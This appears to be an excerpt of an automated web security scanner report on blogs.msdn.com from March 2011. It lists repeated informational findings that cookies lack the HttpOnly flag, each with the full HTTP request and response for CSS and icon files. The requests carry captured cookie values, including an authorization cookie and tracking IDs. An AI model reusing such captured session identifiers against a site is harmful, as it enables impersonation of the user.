Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/css/content-fragments-weblogs.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/css/content-fragments-weblogs.css HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a51+GMT; CommunityServer-UserCookie1001=lv=Thu%2c+24+Mar+2011+11%3a02%3a45+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a54+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:42:04 GMT
Accept-Ranges: bytes
ETag: "a4a9e6a762becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a56+GMT; expires=Sun, 25-Mar-2012 01:26:56 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:33 GMT
Content-Length: 38670

/* $Blog News
/******************************/
.content-fragment.blog-news .page { padding: 0; margin: 0; }
.content-fragment.blog-news .page-content { padding: 0; margin: 0; }

/* $Blog Title
/
...[SNIP]...
15.54. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-wikis.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/css/content-fragments-wikis.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/css/content-fragments-wikis.css HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a51+GMT; CommunityServer-UserCookie1001=lv=Thu%2c+24+Mar+2011+11%3a02%3a45+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a54+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:42:04 GMT
Accept-Ranges: bytes
ETag: "99a7e7a762becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a00+GMT; expires=Sun, 25-Mar-2012 01:35:00 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:34 GMT
Content-Length: 24464

/* $Wiki Title
/******************************/
.content-fragment.wiki-title { display: none; }

/* $Wiki Banner
/******************************/
.content-fragment.wiki-banner .content-fragment-
...[SNIP]...
15.55. http://blogs.msdn.com/themes/MSDN2/css/content-fragments.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/css/content-fragments.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/css/content-fragments.css HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a51+GMT; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a43%3a31+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:42:04 GMT
Accept-Ranges: bytes
ETag: "81f0e0a762becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Thu%2c+24+Mar+2011+11%3a02%3a45+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a54+GMT; expires=Sun, 25-Mar-2012 01:26:54 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:32 GMT
Content-Length: 331

...@import url('content-fragments-core.css');
@import url('content-fragments-forums.css');
@import url('content-fragments-groups.css');
@import url('content-fragments-mediagalleries.css');
@import
...[SNIP]...
15.56. http://blogs.msdn.com/themes/MSDN2/css/footer-fragments.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/css/footer-fragments.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/css/footer-fragments.css HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a51+GMT; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a43%3a31+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:42:04 GMT
Accept-Ranges: bytes
ETag: "b918eaa762becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Thu%2c+24+Mar+2011+11%3a02%3a45+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a54+GMT; expires=Sun, 25-Mar-2012 01:26:54 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:32 GMT
Content-Length: 3667

.../* $Footer-Fragments
/******************************/
.footer-fragments { display: block; position: relative; padding: 10px; margin: 0 auto; }
.footer-fragments-header { border-top: solid 1px #c
...[SNIP]...
15.57. http://blogs.msdn.com/themes/MSDN2/css/header-fragments.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/css/header-fragments.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/css/header-fragments.css HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a51+GMT; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a43%3a31+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:42:04 GMT
Accept-Ranges: bytes
ETag: "5b78eba762becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Thu%2c+24+Mar+2011+11%3a02%3a45+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a54+GMT; expires=Sun, 25-Mar-2012 01:26:54 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:32 GMT
Content-Length: 18751

/* $Header-Fragments
/******************************/
.header-fragments { background-color: #fff; }
.msdn-header-fragment-inner { position: relative; width: 960px; margin: 0 auto; }

.msdn-header
...[SNIP]...
15.58. http://blogs.msdn.com/themes/MSDN2/css/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/css/print.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/css/print.css HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+12+Mar+2011+13%3a09%3a16+GMT; communityserver-usercookie1001=lv=Sat%2c+12+Mar+2011+13%3a09%3a16+GMT&mra=Sat%2c+26+Mar+2011+01%3a43%3a29+GMT; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:42:04 GMT
Accept-Ranges: bytes
ETag: "5ec0eea762becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a53+GMT; expires=Sun, 25-Mar-2012 01:26:53 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:31 GMT
Content-Length: 8135

.layout, .page-editing, .page-tabs, .admin-bar .navigation-list, .admin-bar fieldset.field-list, .msdn-header-fragment-inner, .poweredby-wrapper, .footer-fragments, .footer-fragments-header, .footer-f
...[SNIP]...
15.59. http://blogs.msdn.com/themes/MSDN2/css/screen.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/css/screen.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/css/screen.css HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+12+Mar+2011+13%3a09%3a16+GMT; communityserver-usercookie1001=lv=Sat%2c+12+Mar+2011+13%3a09%3a16+GMT&mra=Sat%2c+26+Mar+2011+01%3a43%3a29+GMT; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:42:04 GMT
Accept-Ranges: bytes
ETag: "82eefa762becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a52+GMT; expires=Sun, 25-Mar-2012 01:26:52 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:31 GMT
Content-Length: 143

@import url('base.css');
@import url('header-fragments.css');
@import url('content-fragments.css');
@import url('footer-fragments.css');

15.60. http://blogs.msdn.com/themes/MSDN2/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/favicon.ico HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; s_cc=true; s_sq=%5B%5BB%5D%5D; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a36%3a17+GMT; CommunityServer-UserCookie1001=lv=Thu%2c+24+Mar+2011+13%3a12%3a04+GMT&mra=Sat%2c+26+Mar+2011+01%3a41%3a33+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/x-icon
Last-Modified: Thu, 27 Jan 2011 20:42:04 GMT
Accept-Ranges: bytes
ETag: "8e93c1a762becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Mon%2c+28+Feb+2011+19%3a23%3a13+GMT&mra=Sat%2c+26+Mar+2011+01%3a41%3a53+GMT; expires=Sun, 25-Mar-2012 01:41:53 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:45:31 GMT
Content-Length: 1150

............ .h.......(....... ..... .......................................w..d..~:..|8..z6..x4..w3..u2..r1..K$.{.........................v...t...N..z6..x4..w4..u2..r1..p0..n/.............{...{.....
...[SNIP]...
15.61. http://blogs.msdn.com/themes/blogs/MSDN2/css/DynamicStyle.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/blogs/MSDN2/css/DynamicStyle.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/blogs/MSDN2/css/DynamicStyle.aspx?WeblogID=12415&PreviewKey=0 HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+12+Mar+2011+13%3a09%3a16+GMT; communityserver-usercookie1001=lv=Sat%2c+12+Mar+2011+13%3a09%3a16+GMT&mra=Sat%2c+26+Mar+2011+01%3a43%3a29+GMT; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143

Response

HTTP/1.1 200 OK
Cache-Control: public
Expires: Sat, 26 Mar 2011 02:13:31 GMT
Last-Modified: Sat, 26 Mar 2011 01:43:31 GMT
ETag: 634367006111673219
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a43%3a31+GMT; expires=Sun, 25-Mar-2012 01:43:31 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:31 GMT
Content-Length: 0

15.62. http://blogs.msdn.com/themes/blogs/MSDN2/css/MSDNblogs.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/blogs/MSDN2/css/MSDNblogs.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/blogs/MSDN2/css/MSDNblogs.css HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+12+Mar+2011+13%3a09%3a16+GMT; communityserver-usercookie1001=lv=Sat%2c+12+Mar+2011+13%3a09%3a16+GMT&mra=Sat%2c+26+Mar+2011+01%3a43%3a29+GMT; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:41:56 GMT
Accept-Ranges: bytes
ETag: "9a204ea362becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a52+GMT; expires=Sun, 25-Mar-2012 01:26:52 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:31 GMT
Content-Length: 47787

...@import url('../../../msdn2/css/msdn.css');
body, html {
   font-family: 'Segoe UI', 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif;
   background:url('/Themes/MSDN2/Images/MSDN/bg_body_MSDN
...[SNIP]...
15.63. http://blogs.msdn.com/themes/generic/css/layout.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/generic/css/layout.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/generic/css/layout.css HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+12+Mar+2011+13%3a09%3a16+GMT; communityserver-usercookie1001=lv=Sat%2c+12+Mar+2011+13%3a09%3a16+GMT&mra=Sat%2c+26+Mar+2011+01%3a43%3a29+GMT; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:42:47 GMT
Accept-Ranges: bytes
ETag: "ce7bdfc162becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a03+GMT; expires=Sun, 25-Mar-2012 01:45:03 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:48:46 GMT
Content-Length: 14802

....page-management-header { }
.page-management { text-align: left; font-family: Arial, Helvetica !important; font-size: 12px !important; position: relative; border-top: solid 2px #aaa; background-co
...[SNIP]...
15.64. http://blogs.msdn.com/themes/generic/css/layout.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/generic/css/layout.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/generic/css/layout.css HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+12+Mar+2011+13%3a09%3a16+GMT; communityserver-usercookie1001=lv=Sat%2c+12+Mar+2011+13%3a09%3a16+GMT&mra=Sat%2c+26+Mar+2011+01%3a43%3a29+GMT; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:42:47 GMT
Accept-Ranges: bytes
ETag: "ce7bdfc162becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a51+GMT; expires=Sun, 25-Mar-2012 01:26:51 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:31 GMT
Content-Length: 14802

....page-management-header { }
.page-management { text-align: left; font-family: Arial, Helvetica !important; font-size: 12px !important; position: relative; border-top: solid 2px #aaa; background-co
...[SNIP]...
15.65. http://blogs.msdn.com/themes/msdn2/css/msdn.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/msdn2/css/msdn.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/msdn2/css/msdn.css HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
